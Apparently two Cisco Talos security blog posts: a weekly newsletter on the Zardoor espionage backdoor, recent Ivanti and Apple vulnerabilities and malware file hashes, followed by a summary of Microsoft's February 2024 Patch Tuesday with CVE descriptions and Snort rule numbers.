If readers suspect their system(s) may have been compromised by commercial spyware or hack-for-hire groups, please consider notifying Talos’ research team at [email protected] to assist in furthering the community’s knowledge of these threats. 

The one big thing 

Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family named “Zardoor.” Talos believes an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. In at least one attack, the actors have infected an Islamic charitable non-profit organization in Saudi Arabia, often exfiltrating data multiple times in a month. 

Why do I care? 

At this time, we have only discovered one compromised target. However, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be other victims that we don’t know about yet. This also appears to be the work of a yet-to-be-identified threat actor, as Talos cannot attribute the observed TTPs to a known group. Zardoor is a dangerous backdoor that can remain undetected for extended periods, and without much prior information about this actor, it’s tough to predict where they might pivot next. 

So now what? 

Talos has released new ClamAV signatures and Snort rules to protect against Zardoor and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this backdoor.  

Top security headlines of the week 

Adversaries are actively exploiting three vulnerabilities in Ivanti’s VPN software, including one newly discovered over the weekend. Ivanti first disclosed two vulnerabilities on Jan. 22 affecting Ivanti’s Connect Secure and Policy Secure VPN products. Eventually, attackers took notice and started targeting unpatched instances of the software. Shortly after disclosure, the U.S. Cybersecurity and Infrastructure Security Agency gave federal agencies only 48 hours to disconnect any devices that used the affected software. Patches are now available for the three vulnerabilities, and users are encouraged to update as soon as possible. The CISA directive said that “agencies running the affected products must assume domain accounts associated with the affected products have been compromised” and said that agencies should reset “passwords twice for on premise [SIC] accounts, revoke Kerberos tickets, and then revoke tokens for cloud accounts in hybrid deployments” by March 1. It also said, “for cloud joined/registered devices, disable devices in the cloud to revoke the device tokens.” The newest vulnerability, CVE-2024-21893, is a server-side request forgery that could allow an attacker to access certain restricted resources without authentication. (Ars Technica, Decipher) 

Apple addressed a security issue early in the life of its newly released Apple Vision Pro, a mixed-reality headset. Days after initial reviews for the product were published, Apple released its first security update for the headset, saying that a vulnerability in the WebKit browser engine “may have been exploited” in the wild. The vulnerability, CVE-2024-23222, also affects other Apple operating systems, including iOS and iPadOS. Vision Pro users also discovered that, before the software patch, they could not reset the password on their device without physically bringing the headset to a retail Apple store. The passcode, typically a series of digits for the headset, could only be reset if the users gave the physical device to Apple support or mailed it to AppleCare. However, Apple added the ability to reset the device’s passcode in the same patch that fixed the aforementioned vulnerability. (TechCrunch, Bloomberg) 


Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934 
MD5: 93fefc3e88ffb78abb36365fa5cf857c 
Typical Filename: Wextract 
Claimed Product: Internet Explorer 
Detection Name: W32.File.MalParent 

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440 
MD5: ef6ff172bf3e480f1d633a6c53f7a35e 
Typical Filename: iizbpyilb.bat 
Claimed Product: N/A  
Detection Name: Trojan.Agent.DDOH 

SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7  
MD5: 0e4c49327e3be816022a233f844a5731  
Typical Filename: aact.exe  
Claimed Product: AAct x86  
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: tmp000c3787 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities

13 February 2024 at 18:59

Microsoft followed up one of the lightest recent Patch Tuesdays in January with a large release of vulnerabilities on Tuesday, although still far from numbers seen in the past. 

In all, February’s security update from Microsoft includes 75 vulnerabilities, three of which are considered critical. There are 69 “important” vulnerabilities, according to Microsoft, and three that are of “moderate” severity.

Although rated only “moderate” in severity, one of the vulnerabilities is being actively exploited in the wild: CVE-2024-21351, a security feature bypass vulnerability in Windows SmartScreen. SmartScreen protects users from malicious websites and files downloaded from the internet. Exploiting this vulnerability may allow a user to be tricked into downloading and executing a file from the internet without the usual SmartScreen protections. There were no zero-day vulnerabilities disclosed in last month’s Patch Tuesday.

Of the three critical vulnerabilities, one (CVE-2024-20684) could allow an attacker who controls a Hyper-V guest to cause a denial of service on the host and, as a consequence, on all other guests of the same host.

CVE-2024-21357 is another critical remote code execution vulnerability, this one in a multicast network protocol called Windows Pragmatic General Multicast. The vulnerability could, in theory, allow an attacker on the same network to execute code on other systems on that network. Microsoft considers exploitation of the vulnerability complex; however, the company does list it as “more likely” to be exploited.

The third critical vulnerability (CVE-2024-21380) is an information disclosure vulnerability in Microsoft Dynamics Business Central/NAV. According to Microsoft, exploitation requires user interaction, and the attacker must first win a race condition. Therefore, it’s considered to be a more complex attack and “less likely” to be exploited.

Cisco Talos would also like to highlight CVE-2024-21378, a remote code execution vulnerability in Microsoft Outlook. However, according to the advisory, this requires the attacker to be on the same network as the targeted machine and trick the victim into opening a specially crafted file or email.

CVE-2024-21379 is also a remote code execution vulnerability, this time in Microsoft Word. Exploiting this vulnerability requires an attacker to send to a victim a specially crafted Word document that, when opened, would allow remote code execution in the victim’s system.

The advisory contains 26 other remote code execution vulnerabilities that are considered “less likely” to be exploited. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63000 - 63001, 63004, 63005, 62992 - 62994, 62998 and 62999. There are also Snort 3 rules 300822 - 300826.
